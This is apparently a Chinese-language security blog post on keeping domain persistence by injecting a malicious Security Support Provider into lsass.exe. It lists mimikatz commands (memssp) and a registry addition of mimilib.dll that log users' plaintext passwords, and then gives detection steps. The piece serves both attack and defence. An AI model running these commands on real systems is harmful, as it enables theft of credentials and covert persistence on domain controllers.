域内权限维持:注入SSP

01、简介

SSP(Security Support Provider)是Windows操作系统安全机制的提供者。简单地说,SSP是个DLL文件,主要用来实现Windows操作系统的身份认证功能。在系统启动时,SSP 将被加载到lsass.exe进程中,攻击者通过自定义恶意的DLL文件,在系统启动时将其加载到lsass.exe进程中,就能够获取lsass.exe进程中的明文密码。这样,即使用户更改密码并重新登录,攻击者依然可以获取该账号的新密码,可以使用该方法进行持久化操作。

02、利用方式

方法一:进程注入lsass.exe

使用mimikatz将伪造的SSP注人内存,用户重新登录后,在C:\Windows\System32\mimilsa.log成功获得明文密码。

mimikatz # privilege::debug
mimikatz # misc::memssp

 

方法二:加载mimilib.dll

将mimikatz中的mimilib.dll 放到目标域控的C:\Windows\system32目录下,使用的dll位数需与目标系统一致.

修改注册表,将mimilib.dll添加到注册表中。

reg add "hklm\system\currentcontrolset\control\lsa" /v "Security Packages" /d "mimilib.dll" /t REG_MULTI_SZ

系统重启后,用户登录,获取到的明文保存在C:\Windows\System32\kiwissp.log。

 

  03、检测方法

(1)检测服务器是否存在mimilsa.log、kiwissp.log以及注册表的键值,检测C:\Windows\system32目录是否在mimilib.dll。 

(2)使用火绒剑进行系统钩子扫描,定位到HOOK地址,可以查看详细信息和代码。点击修复钩子即可修复SSP注人,再次登录用户mimilsa.log 不再记录用户明文密码。

 

 

(3)在进程和启动项,都可以找到异常的mimilib.dll。

 

 

(4)使用第三方工具 Autoruns 检测 LSA中是否存在可疑dll。 Autoruns下载:https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns  

 

 

 

 

参考连接:

https://blog.csdn.net/weixin_42282189/article/details/120103661

posted @ 2023-01-29 10:11  Bypass  阅读(320)  评论(0编辑  收藏  举报